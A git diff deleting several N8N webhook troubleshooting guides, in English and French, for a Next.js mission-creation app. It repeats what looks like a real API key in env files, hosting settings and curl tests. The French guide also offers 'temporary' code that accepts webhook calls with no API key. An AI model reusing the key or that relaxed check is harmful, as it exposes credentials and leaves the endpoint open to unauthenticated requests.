to Fix - -### Step 1: Determine Your Environment - -**Are you running**: -- Local development? -- Production server? -- Docker container? -- Vercel/other hosting? - -### Step 2: Add N8N_API_KEY - -#### Option A: Local Development (`.env.local`) - -**Create or edit `.env.local` file** in your project root: - -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Then restart your development server**: -```bash -# Stop the server (Ctrl+C) -# Restart -npm run dev -# or -yarn dev -``` - -#### Option B: Production Server - -**If using Docker**: -Add to `docker-compose.yml`: -```yaml -services: - app: - environment: - - N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Or in `.env` file** (if using docker-compose with env_file): -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**If using CapRover**: -1. Go to App Settings -2. App Configs → Environment Variables -3. Add: `N8N_API_KEY` = `LwgeE1ntADD20OuWC88S3pR0EaO7FtO4` -4. Save and restart the app - -**If using Vercel**: -1. Go to Project Settings -2. Environment Variables -3. Add: `N8N_API_KEY` = `LwgeE1ntADD20OuWC88S3pR0EaO7FtO4` -4. Redeploy - -**If using other hosting**: -- Add `N8N_API_KEY` to your hosting platform's environment variables -- Restart/redeploy the application - ---- - -## 🧪 Verification - -### Step 1: Check if Variable is Set - -**Create a test endpoint** to verify: - -```typescript -// app/api/test-env/route.ts -import { NextResponse } from 'next/server'; - -export async function GET() { - return NextResponse.json({ - hasN8NApiKey: !!process.env.N8N_API_KEY, - n8nApiKeyLength: process.env.N8N_API_KEY?.length || 0, - // Don't expose the actual key! - }); -} -``` - -**Then visit**: `http://localhost:3000/api/test-env` (or your production URL) - -**Expected**: -```json -{ - "hasN8NApiKey": true, - "n8nApiKeyLength": 32 -} -``` - -### Step 2: Test the Endpoint Manually - -**After adding the variable and restarting**: - -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" \ - -d '{ - "missionId": "test-mission-id", - "name": "Test Mission", - "creatorId": "test-user-id" - }' -``` - -**Expected**: -- ✅ **200 OK** with JSON response (if mission exists) -- ❌ **500 error** if `N8N_API_KEY` is still not set -- ❌ **401 error** if API key doesn't match - -### Step 3: Check Server Logs - -**After adding the variable**, check your server logs. You should **NOT** see: -``` -N8N_API_KEY not configured in environment -``` - -**You SHOULD see** (when endpoint is called): -``` -Mission Created Webhook Received -Received mission-created data: { ... } -``` - ---- - -## 🔍 Troubleshooting - -### Issue 1: Variable Not Loading - -**Symptom**: Still getting 500 error after adding variable - -**Possible causes**: -1. **Wrong file**: Using `.env` instead of `.env.local` (Next.js prefers `.env.local`) -2. **Not restarted**: Server needs restart after adding env variable -3. **Wrong location**: `.env.local` must be in project root (same level as `package.json`) -4. **Syntax error**: Check for quotes, spaces, or special characters - -**Fix**: -```env -# Correct -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 - -# Wrong (with quotes) -N8N_API_KEY="LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" - -# Wrong (with spaces) -N8N_API_KEY = LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -### Issue 2: Different Key in N8N - -**Symptom**: 401 Unauthorized error - -**Cause**: The API key in N8N workflow doesn't match the one in environment - -**Fix**: -- Use the same key in both places -- Or update N8N workflow to use the key from environment - -### Issue 3: Production vs Development - -**Symptom**: Works locally but not in production - -**Cause**: Environment variable only set in development - -**Fix**: Add the variable to production environment as well - ---- - -## 📋 Complete Checklist - -- [ ] `N8N_API_KEY` added to `.env.local` (development) or production environment -- [ ] Variable has correct value (no quotes, no spaces) -- [ ] Application restarted after adding variable -- [ ] Test endpoint shows `hasN8NApiKey: true` -- [ ] Manual curl test returns 200 (not 500) -- [ ] Server logs show "Mission Created Webhook Received" (not "N8N_API_KEY not configured") -- [ ] N8N workflow uses same API key in header - ---- - -## 🎯 Expected Flow After Fix - -1. **Mission created** ✅ -2. **N8N workflow triggered** ✅ -3. **N8N creates integrations** ✅ -4. **N8N calls `/api/missions/mission-created`** ✅ -5. **Endpoint receives request** ✅ -6. **API key validated** ✅ -7. **IDs saved to database** ✅ -8. **Mission has integration IDs** ✅ - ---- - -## 📝 Summary - -**Problem**: 500 "Server configuration error" - -**Root Cause**: `N8N_API_KEY` environment variable is not set - -**Solution**: -1. Add `N8N_API_KEY` to environment variables -2. Use the same key value that N8N is sending in the `x-api-key` header -3. Restart the application -4. Test the endpoint - -**After Fix**: The endpoint should return 200 OK and save integration IDs to the database. - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks integration IDs from being saved - diff --git a/N8N_API_KEY_SOLUTION.md b/N8N_API_KEY_SOLUTION.md deleted file mode 100644 index b61b23d..0000000 --- a/N8N_API_KEY_SOLUTION.md +++ /dev/null @@ -1,170 +0,0 @@ -# Solution: N8N API Key Mismatch - -## 🔍 Problème - -**Avant** : Vous pouviez créer des missions sans `N8N_API_KEY` -- Mission créée ✅ -- N8N callback échouait silencieusement ❌ -- Mission restait en base sans IDs ❌ - -**Maintenant** : Avec `N8N_API_KEY` ajouté -- Mission créée ✅ -- N8N callback appelé ✅ -- **Mais clé API ne correspond pas → 401 → Mission création échoue** ❌ - ---- - -## ✅ Solution 1: Utiliser la Même Clé (RECOMMANDÉ) - -### Étape 1: Trouver la Clé Générée par N8N - -**Dans N8N** : -1. Allez dans les paramètres de votre workflow -2. Trouvez la clé API que N8N utilise -3. Ou regardez dans les logs d'exécution N8N pour voir quelle clé est envoyée - -### Étape 2: Utiliser Cette Clé sur le Serveur - -**Ajoutez la même clé dans votre environnement** : - -```env -N8N_API_KEY=la-cle-generee-par-n8n -``` - -**Important** : Utilisez **exactement la même clé** que celle générée par N8N. - -### Étape 3: Redémarrer le Serveur - -```bash -# Redémarrer l'application -npm run dev -# ou -yarn dev -``` - ---- - -## ✅ Solution 2: Rendre la Vérification Plus Flexible (TEMPORAIRE) - -Si vous voulez permettre la création de mission même si les clés ne correspondent pas : - -**Modifier `app/api/missions/mission-created/route.ts`** : - -```typescript -// Vérifier l'API key -const apiKey = request.headers.get('x-api-key'); -const expectedApiKey = process.env.N8N_API_KEY; - -// Si pas de clé configurée, accepter (mais logger un warning) -if (!expectedApiKey) { - logger.warn('N8N_API_KEY not configured, accepting request without validation'); - // Continue without validation -} else if (apiKey && apiKey !== expectedApiKey) { - logger.error('Invalid API key', { - received: apiKey ? 'present' : 'missing', - expected: expectedApiKey ? 'configured' : 'missing' - }); - return NextResponse.json( - { error: 'Unauthorized' }, - { status: 401 } - ); -} else if (!apiKey && expectedApiKey) { - logger.warn('API key expected but not provided, accepting anyway'); - // Continue without validation (less secure but works) -} -``` - -**⚠️ Note** : Cette solution est moins sécurisée mais permet de continuer à fonctionner. - ---- - -## ✅ Solution 3: Utiliser la Clé du Serveur dans N8N - -**Au lieu d'utiliser la clé générée par N8N**, utilisez celle du serveur : - -### Dans N8N "Save Mission To API" Node - -**Header `x-api-key`** : -``` -{{ $node['Process Mission Data'].json.config.N8N_API_KEY }} -``` - -**Cette valeur vient de** : -- `config.N8N_API_KEY` envoyé par le serveur (ligne 420) -- Qui vient de `process.env.N8N_API_KEY` - -**Donc** : Si vous mettez la même clé dans `process.env.N8N_API_KEY`, N8N l'utilisera automatiquement. - ---- - -## 🎯 Solution Recommandée - -**Utiliser la clé générée par N8N dans l'environnement du serveur** : - -1. **Copier la clé générée par N8N** -2. **L'ajouter dans `.env.local`** (ou variables d'environnement production) : - ```env - N8N_API_KEY=votre-cle-generee-par-n8n - ``` -3. **Redémarrer le serveur** -4. **Tester la création de mission** - -**Avantage** : -- ✅ Sécurisé (vérification de clé) -- ✅ Fonctionne correctement -- ✅ IDs sauvegardés - ---- - -## 🔍 Comment Trouver la Clé N8N - -### Option 1: Dans N8N Workflow - -1. Ouvrez le workflow N8N -2. Regardez le node "Save Mission To API" -3. Vérifiez la valeur de `x-api-key` header -4. Ou regardez dans `config.N8N_API_KEY` dans "Process Mission Data" - -### Option 2: Dans N8N Execution Logs - -1. Allez dans N8N → Executions -2. Trouvez une exécution récente -3. Regardez le node "Save Mission To API" -4. Vérifiez les headers de la requête -5. Trouvez la valeur de `x-api-key` - -### Option 3: Générer une Nouvelle Clé - -**Si vous ne trouvez pas la clé**, vous pouvez : -1. Générer une nouvelle clé (ex: `openssl rand -hex 16`) -2. L'ajouter dans l'environnement du serveur -3. L'utiliser dans N8N workflow (hardcoder temporairement) - ---- - -## 📋 Checklist - -- [ ] Trouver la clé API générée par N8N -- [ ] Ajouter cette clé dans `N8N_API_KEY` environnement serveur -- [ ] Vérifier que N8N utilise `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` -- [ ] Redémarrer le serveur -- [ ] Tester création de mission -- [ ] Vérifier que les IDs sont sauvegardés - ---- - -## 🎯 Résumé - -**Problème** : Clé API N8N ≠ Clé API serveur → 401 Unauthorized - -**Solution** : Utiliser la **même clé** dans les deux endroits : -1. Environnement serveur : `N8N_API_KEY=cle-commune` -2. N8N workflow : Utilise automatiquement via `config.N8N_API_KEY` - -**Après fix** : Mission création fonctionne et IDs sont sauvegardés ✅ - ---- - -**Document Created**: $(date) -**Priority**: HIGH - Blocks mission creation - diff --git a/N8N_CONFIGURATION_FIX.md b/N8N_CONFIGURATION_FIX.md deleted file mode 100644 index 9142500..0000000 --- a/N8N_CONFIGURATION_FIX.md +++ /dev/null @@ -1,292 +0,0 @@ -# N8N Configuration Fix - Environment Variables & Webhook Activation - -## 🔍 Problems Identified - -Based on your error logs, there are **THREE critical issues**: - -1. ❌ **N8N_API_KEY is not set in environment variables** -2. ❌ **404 Error**: Webhook "mission-created" is not registered (workflow not active) -3. ❌ **500 Error**: "Error in workflow" (workflow is running but failing) - ---- - -## ✅ Fix 1: Set N8N_API_KEY Environment Variable - -### Problem -``` -N8N_API_KEY is not set in environment variables -``` - -### Solution - -**Add to your `.env` or `.env.local` file**: - -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Or if using a different key**, use your actual N8N API key. - -### Where to Add - -1. **Local Development** (`.env.local`): - ```env - N8N_API_KEY=your-actual-api-key-here - ``` - -2. **Production** (environment variables in your hosting platform): - - Vercel: Settings → Environment Variables - - Docker: `docker-compose.yml` or `.env` file - - CapRover: App Settings → App Configs → Environment Variables - -### Verify It's Set - -After adding, restart your application and check logs. You should **NOT** see: -``` -N8N_API_KEY is not set in environment variables -``` - ---- - -## ✅ Fix 2: Activate N8N Workflow - -### Problem -``` -404 Error: The requested webhook "mission-created" is not registered. -Hint: Click the 'Execute workflow' button on the canvas, then try again. -``` - -### Solution - -**In N8N Interface**: - -1. **Open your workflow** in N8N (the one with the webhook node) -2. **Click "Active" toggle** in the top right to activate the workflow - - The toggle should be **GREEN/ON** ✅ - - If it's gray/off, click it to activate - -3. **Verify the webhook node**: - - The webhook node should show as "Active" - - The webhook path should be: `mission-created` - - The full URL should be: `https://brain.slm-lab.net/webhook/mission-created` - -### Alternative: Test Mode - -If you're testing: -1. Click **"Execute Workflow"** button on the canvas -2. This activates the webhook for **one test call** -3. After the test, activate the workflow permanently - -### Verify Webhook is Active - -**Test the webhook URL**: -```bash -curl -X POST https://brain.slm-lab.net/webhook/mission-created \ - -H "Content-Type: application/json" \ - -d '{"test": "data"}' -``` - -**Expected**: -- If active: Should trigger the workflow (may return error if data is invalid, but should not be 404) -- If not active: Returns 404 with message about webhook not registered - ---- - -## ✅ Fix 3: Fix Workflow Errors (500 Error) - -### Problem -``` -500 Error: {"message":"Error in workflow"} -``` - -This means the workflow is running but encountering an error. Common causes: - -### Common Issues & Fixes - -#### Issue 3.1: Missing missionId in Process Mission Data - -**Check**: The "Process Mission Data" node should include `missionId` in its output. - -**Fix**: Ensure the node includes: -```javascript -missionId: missionData?.missionId || missionData?.body?.missionId -``` - -#### Issue 3.2: Incorrect URL in Save Mission To API Node - -**Check**: The "Save Mission To API" node URL should be: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -**NOT**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} -``` - -#### Issue 3.3: Missing missionId in Save Mission To API Body - -**Check**: The "Save Mission To API" node body should include: -- Parameter: `missionId` -- Value: `{{ $node['Process Mission Data'].json.missionId }}` - -#### Issue 3.4: API Key Mismatch - -**Check**: The API key in the "Save Mission To API" node header should match your `N8N_API_KEY` environment variable. - -**Fix**: Use: -``` -{{ $node['Process Mission Data'].json.config.N8N_API_KEY }} -``` - -### Debug Workflow Errors - -1. **Check N8N Execution Logs**: - - Go to N8N → Executions - - Find the failed execution - - Click on it to see which node failed - - Check the error message - -2. **Test Each Node Individually**: - - Execute the workflow step by step - - Check each node's output - - Verify data is flowing correctly - ---- - -## 📋 Complete Checklist - -### Environment Variables -- [ ] `N8N_API_KEY` is set in `.env.local` or production environment -- [ ] Value matches the API key used in N8N workflow -- [ ] Application has been restarted after adding the variable - -### N8N Workflow Configuration -- [ ] Workflow is **ACTIVE** (green toggle in N8N) -- [ ] Webhook path is: `mission-created` -- [ ] Webhook URL is: `https://brain.slm-lab.net/webhook/mission-created` -- [ ] "Process Mission Data" node includes `missionId` in output -- [ ] "Save Mission To API" node URL is correct: `{{ MISSION_API_URL }}/api/missions/mission-created` -- [ ] "Save Mission To API" node includes `missionId` in body parameters -- [ ] "Save Mission To API" node includes `x-api-key` header with correct value - -### Testing -- [ ] Test webhook URL returns 200 (not 404) -- [ ] Create a test mission -- [ ] Check N8N execution logs for errors -- [ ] Verify mission IDs are saved to database after creation - ---- - -## 🧪 Step-by-Step Testing - -### Step 1: Verify Environment Variable - -```bash -# In your terminal (if running locally) -echo $N8N_API_KEY - -# Or check in your application logs -# Should NOT see: "N8N_API_KEY is not set in environment variables" -``` - -### Step 2: Test Webhook is Active - -```bash -curl -X POST https://brain.slm-lab.net/webhook/mission-created \ - -H "Content-Type: application/json" \ - -d '{"test": "data"}' -``` - -**Expected Results**: -- ✅ **200/400/500 with workflow error**: Webhook is active (workflow may fail due to invalid data, but webhook is registered) -- ❌ **404 with "webhook not registered"**: Webhook is NOT active → Activate workflow in N8N - -### Step 3: Test Mission Creation - -1. Create a mission via your frontend -2. Check server logs - should NOT see: - - ❌ "N8N_API_KEY is not set" - - ❌ "404 webhook not registered" -3. Check N8N execution logs - should see successful execution -4. Check database - mission should have integration IDs saved - ---- - -## 🔧 Quick Fix Commands - -### Add N8N_API_KEY to .env.local - -```bash -# Add to .env.local file -echo "N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" >> .env.local - -# Restart your development server -# npm run dev -# or -# yarn dev -``` - -### Verify Environment Variable is Loaded - -Create a test endpoint to verify: - -```typescript -// app/api/test-n8n-config/route.ts -import { NextResponse } from 'next/server'; - -export async function GET() { - return NextResponse.json({ - hasN8NApiKey: !!process.env.N8N_API_KEY, - n8nWebhookUrl: process.env.N8N_WEBHOOK_URL || 'https://brain.slm-lab.net/webhook/mission-created', - missionApiUrl: process.env.NEXT_PUBLIC_API_URL - }); -} -``` - -Then visit: `http://localhost:3000/api/test-n8n-config` - ---- - -## 📝 Summary of Fixes - -1. **Add `N8N_API_KEY` to environment variables** - - File: `.env.local` (development) or production environment - - Value: Your actual N8N API key - - Restart application after adding - -2. **Activate N8N Workflow** - - Open workflow in N8N - - Click "Active" toggle (should be green/on) - - Verify webhook is registered - -3. **Fix Workflow Configuration** - - Ensure "Save Mission To API" URL is correct - - Ensure `missionId` is included in body - - Check N8N execution logs for specific errors - ---- - -## 🚨 If Still Not Working - -### Check N8N Execution Logs - -1. Go to N8N → Executions -2. Find the latest failed execution -3. Click on it -4. Check which node failed -5. Look at the error message -6. Fix the specific issue - -### Common Additional Issues - -- **Network connectivity**: N8N can't reach your API -- **CORS issues**: If calling from browser -- **Authentication**: API key mismatch -- **Data format**: Body parameters don't match expected format - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks mission creation - diff --git a/N8N_ROCKETCHAT_FIX.md b/N8N_ROCKETCHAT_FIX.md deleted file mode 100644 index 5768aa8..0000000 --- a/N8N_ROCKETCHAT_FIX.md +++ /dev/null @@ -1,98 +0,0 @@ -# Correction N8N - RocketChat Channel ID - -## 🔍 Problème identifié - -D'après la réponse du webhook N8N, la structure de `rocketChatChannel` est : -```json -"rocketChatChannel": { - "id": "6966cbb6c8e9627bcb87daad", - "name": "seffirouuuuuu", - "exists": true, - "error": null -} -``` - -Mais dans le node **"Save Mission To API"**, le code cherche : -``` -$node['Combine Results'].json.rocketChatChannel?.channel?._id -``` - -Ce qui ne correspond pas à la structure réelle qui est `rocketChatChannel.id` (pas `rocketChatChannel.channel._id`). - ---- - -## ✅ Solution : Modifier dans N8N - -### Étape 1 : Ouvrir le workflow N8N - -1. Connectez-vous à N8N -2. Ouvrez le workflow qui gère la création de missions -3. Trouvez le node **"Save Mission To API"** - -### Étape 2 : Modifier le paramètre `rocketchatChannelId` - -Dans le node **"Save Mission To API"**, dans la section **Body Parameters**, trouvez le paramètre : - -**Nom** : `rocketchatChannelId` - -**Valeur actuelle (INCORRECTE)** : -``` -={{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }} -``` - -**Valeur à mettre (CORRECTE)** : -``` -={{ $node['Combine Results'].json.rocketChatChannel?.id || $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }} -``` - -Cette expression essaie d'abord `rocketChatChannel.id` (la structure réelle), puis fait un fallback sur `rocketChatChannel.channel._id` (ancienne structure) si la première n'existe pas. - ---- - -## 🔍 Vérification dans "Combine Results" - -Vérifiez aussi que le node **"Combine Results"** structure correctement les données. - -Dans le code JavaScript de "Combine Results", la ligne qui traite RocketChat devrait extraire l'ID correctement. Vérifiez que cette partie du code gère bien les deux structures : - -```javascript -// Process RocketChat channel result -if (rocketChatResult.error?.includes('error-duplicate-channel-name')) { - console.log('RocketChat channel already exists'); - rocketChatResult = { exists: true }; -} else if (rocketChatResult.body?.channel?._id) { - resourceStatus.rocketChatChannel = true; -} - -// ... - -// Dans la construction du résultat -rocketChatChannel: rocketChatResult.error ? { error: ... } : (rocketChatResult.body || rocketChatResult || {}) -``` - -Si la réponse de RocketChat est directement dans `rocketChatResult.body.channel._id`, alors `rocketChatResult.body` contiendra `{ channel: { _id: "..." } }`. - -Mais d'après votre réponse, il semble que "Combine Results" transforme déjà la structure en `{ id: "...", name: "...", exists: true }`. - ---- - -## 🧪 Test après modification - -Après avoir modifié le node "Save Mission To API", testez avec : - -```bash -./test-n8n-python.py [MISSION_ID] [PROJECT_NAME] -``` - -Vérifiez dans les logs Next.js que `rocketchatChannelId` est bien reçu avec la valeur `"6966cbb6c8e9627bcb87daad"` (ou l'ID réel du channel). - ---- - -## 📝 Résumé des changements - -**Node à modifier** : "Save Mission To API" -**Paramètre** : `rocketchatChannelId` -**Ancienne valeur** : `={{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` -**Nouvelle valeur** : `={{ $node['Combine Results'].json.rocketChatChannel?.id || $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - -Cette modification permet de supporter les deux structures (ancienne et nouvelle) pour plus de robustesse. diff --git a/N8N_SAVE_MISSION_API_FIX.md b/N8N_SAVE_MISSION_API_FIX.md deleted file mode 100644 index fea13e6..0000000 --- a/N8N_SAVE_MISSION_API_FIX.md +++ /dev/null @@ -1,267 +0,0 @@ -# N8N Save Mission To API Node - Fix Required - -## 🔍 Problem Analysis - -Based on the N8N workflow configuration you provided, I've identified **TWO CRITICAL ISSUES**: - ---- - -## ❌ Issue 1: Incorrect URL - -### Current Configuration -``` -URL: {{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} -``` - -### What This Produces -- `MISSION_API_URL` = `https://hub.slm-lab.net` (from your config) -- Result: `https://hub.slm-lab.net/mission-created` ❌ - -### Actual Endpoint -- Should be: `https://hub.slm-lab.net/api/missions/mission-created` ✅ - -### Fix Required -``` -URL: {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -**Note**: Remove the `+` operator and add `/api/missions` before `/mission-created` - ---- - -## ❌ Issue 2: Missing `missionId` in Body - -### Current Configuration -Looking at your `base.json`, I can see the body parameters, but **`missionId` is MISSING**! - -### What the Endpoint Expects -From `app/api/missions/mission-created/route.ts`: -- `missionId` ⚠️ **REQUIRED** - Used to find the mission (preferred over name + creatorId) -- `gitRepoUrl` → maps to `giteaRepositoryUrl` in database -- `leantimeProjectId` → maps to `leantimeProjectId` in database -- `documentationCollectionId` → maps to `outlineCollectionId` in database -- `rocketchatChannelId` → maps to `rocketChatChannelId` in database -- `creatorId` ✅ (you have this) -- `name` ✅ (you have this) - -### What the Endpoint Expects -From `app/api/missions/mission-created/route.ts`: -- `gitRepoUrl` → maps to `giteaRepositoryUrl` in database -- `leantimeProjectId` → maps to `leantimeProjectId` in database -- `documentationCollectionId` → maps to `outlineCollectionId` in database -- `rocketchatChannelId` → maps to `rocketChatChannelId` in database -- `missionId` ✅ (you have this) -- `creatorId` ✅ (you have this) -- `name` ✅ (you have this) - -### What N8N Should Send - -**Body Parameters** (in N8N HTTP Request node): - -| Field Name | Value Expression | -|------------|------------------| -| `name` | `{{ $node['Process Mission Data'].json.missionProcessed.name }}` | -| `niveau` | `{{ $node['Process Mission Data'].json.missionProcessed.niveau || 'default' }}` | -| `intention` | `{{ $node['Process Mission Data'].json.missionProcessed.intention }}` | -| `gitRepoUrl` | `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}` | -| `leantimeProjectId` | `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}` | -| `documentationCollectionId` | `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` | -| `rocketchatChannelId` | `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` | -| `missionId` | `{{ $node['Process Mission Data'].json.missionId }}` | -| `creatorId` | `{{ $node['Process Mission Data'].json.creatorId }}` | - -**⚠️ CRITICAL**: The field names must match exactly: -- `gitRepoUrl` (not `gitRepo` or `giteaRepositoryUrl`) -- `leantimeProjectId` (not `leantimeProject` or `leantimeId`) -- `documentationCollectionId` (not `docCollection` or `outlineCollectionId`) -- `rocketchatChannelId` (not `rocketChatChannel` or `rocketChatChannelId`) - ---- - -## ✅ Complete Fix for N8N Node - -### Step 1: Fix the URL - -In the "Save Mission To API" HTTP Request node: - -**Current (WRONG)**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} -``` - -**Fixed (CORRECT)**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -### Step 2: Configure Body Parameters - -In the "Save Mission To API" HTTP Request node, set **Body Parameters**: - -**Method**: `POST` -**Send Body**: `Yes` -**Body Content Type**: `JSON` (or use Body Parameters) - -**Body Parameters** (add each as a parameter): - -1. **Parameter Name**: `name` - **Value**: `{{ $node['Process Mission Data'].json.missionProcessed.name }}` - -2. **Parameter Name**: `niveau` - **Value**: `{{ $node['Process Mission Data'].json.missionProcessed.niveau || 'default' }}` - -3. **Parameter Name**: `intention` - **Value**: `{{ $node['Process Mission Data'].json.missionProcessed.intention }}` - -4. **Parameter Name**: `gitRepoUrl` ⚠️ (MUST be this exact name) - **Value**: `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}` - -5. **Parameter Name**: `leantimeProjectId` ⚠️ (MUST be this exact name) - **Value**: `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}` - -6. **Parameter Name**: `documentationCollectionId` ⚠️ (MUST be this exact name) - **Value**: `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` - -7. **Parameter Name**: `rocketchatChannelId` ⚠️ (MUST be this exact name) - **Value**: `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - -8. **Parameter Name**: `missionId` ⚠️ **MISSING - MUST ADD THIS** - **Value**: `{{ $node['Process Mission Data'].json.missionId }}` - -9. **Parameter Name**: `creatorId` - **Value**: `{{ $node['Process Mission Data'].json.creatorId }}` - -**⚠️ CRITICAL**: The `missionId` field is **MISSING** from your current configuration. The endpoint prefers `missionId` over `name + creatorId` for more reliable mission lookup. - -### Step 3: Verify Headers - -**Headers** should include: -- `Content-Type`: `application/json` -- `x-api-key`: `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` - ---- - -## 🧪 Testing the Fix - -### Test 1: Check URL - -After fixing, the URL should resolve to: -``` -https://hub.slm-lab.net/api/missions/mission-created -``` - -### Test 2: Check Request Body - -After fixing, the request body should look like: -```json -{ - "name": "Mission Name", - "niveau": "default", - "intention": "Mission description", - "gitRepoUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-id", - "rocketchatChannelId": "channel-id", - "missionId": "mission-uuid", - "creatorId": "user-uuid" -} -``` - -### Test 3: Check Server Response - -The endpoint should return: -```json -{ - "success": true, - "message": "Mission updated successfully", - "mission": { - "id": "mission-uuid", - "name": "Mission Name", - "giteaRepositoryUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "outlineCollectionId": "collection-id", - "rocketChatChannelId": "channel-id" - } -} -``` - ---- - -## 📋 Verification Checklist - -After applying the fix: - -- [ ] URL is correct: `{{ MISSION_API_URL }}/api/missions/mission-created` -- [ ] Body includes `gitRepoUrl` field (not `gitRepo` or `giteaRepositoryUrl`) -- [ ] Body includes `leantimeProjectId` field (not `leantimeProject` or `leantimeId`) -- [ ] Body includes `documentationCollectionId` field (not `docCollection` or `outlineCollectionId`) -- [ ] Body includes `rocketchatChannelId` field (not `rocketChatChannel`) -- [ ] Body includes `missionId` field -- [ ] Body includes `creatorId` field -- [ ] Headers include `x-api-key` -- [ ] Headers include `Content-Type: application/json` -- [ ] Test execution shows 200 OK response -- [ ] Database shows IDs saved after mission creation - ---- - -## 🔍 Debugging - -### If Still Not Working - -1. **Check N8N Execution Logs**: - - Look at "Save Mission To API" node execution - - Check the actual URL being called - - Check the actual body being sent - - Check the response status code - -2. **Check Server Logs**: - - Look for `/api/missions/mission-created` endpoint calls - - Check for 404 errors (wrong URL) - - Check for 400 errors (missing fields) - - Check for 401 errors (wrong API key) - -3. **Test Manually**: - ```bash - curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "test-mission-id", - "name": "Test Mission", - "creatorId": "test-user-id", - "gitRepoUrl": "https://gite.slm-lab.net/alma/test", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-456", - "rocketchatChannelId": "channel-789" - }' - ``` - ---- - -## 📝 Summary - -**Two critical fixes required**: - -1. **URL Fix**: Change from: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} - ``` - To: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created - ``` - -2. **Add Missing `missionId` Field**: Add this parameter to the body: - - **Name**: `missionId` - - **Value**: `{{ $node['Process Mission Data'].json.missionId }}` - -**Note**: Your field names are already correct (`gitRepoUrl`, `leantimeProjectId`, etc.), but `missionId` is missing which is critical for reliable mission lookup. - -After these fixes, the N8N workflow should successfully save integration IDs to the database, and mission deletion should work correctly. - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks mission deletion functionality - diff --git a/N8N_WRONG_URL_FIX.md b/N8N_WRONG_URL_FIX.md deleted file mode 100644 index 22da940..0000000 --- a/N8N_WRONG_URL_FIX.md +++ /dev/null @@ -1,210 +0,0 @@ -# N8N Wrong URL - Getting HTML Instead of JSON - -## 🔍 Problem Identified - -**N8N "Save Mission To API" node is receiving HTML (404 page) instead of JSON response.** - -### What N8N Receives - -```html - - - ... -

404

-

This page could not be found.

- ... - -``` - -**This is a Next.js 404 page**, not the API endpoint response! - ---- - -## ❌ Root Cause - -**The URL in N8N is pointing to a Next.js page route instead of the API endpoint.** - -### Current (WRONG) URL - -N8N is probably calling: -``` -https://hub.slm-lab.net/mission-created -``` - -This matches Next.js route: `app/[section]/page.tsx` -- Next.js tries to find a page at `/mission-created` -- No page exists, so it returns 404 HTML page -- N8N receives HTML instead of JSON - -### Correct URL - -Should be: -``` -https://hub.slm-lab.net/api/missions/mission-created -``` - -This matches API route: `app/api/missions/mission-created/route.ts` -- Next.js routes to the API endpoint -- Returns JSON response -- N8N receives proper JSON - ---- - -## ✅ Solution - -### Fix the URL in N8N "Save Mission To API" Node - -**Current (WRONG)**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} -``` - -**Or**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/mission-created -``` - -**Fixed (CORRECT)**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -### Step-by-Step Fix - -1. **Open N8N workflow** -2. **Find "Save Mission To API" node** -3. **Click on it to edit** -4. **In the URL field**, change from: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/mission-created - ``` - - To: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created - ``` - -5. **Save the node** -6. **Activate the workflow** (if not already active) -7. **Test by creating a new mission** - ---- - -## 🧪 Verification - -### After Fix, N8N Should Receive - -**Expected JSON Response**: -```json -{ - "success": true, - "message": "Mission updated successfully", - "mission": { - "id": "mission-uuid", - "name": "Mission Name", - "giteaRepositoryUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "outlineCollectionId": "collection-456", - "rocketChatChannelId": "channel-789" - } -} -``` - 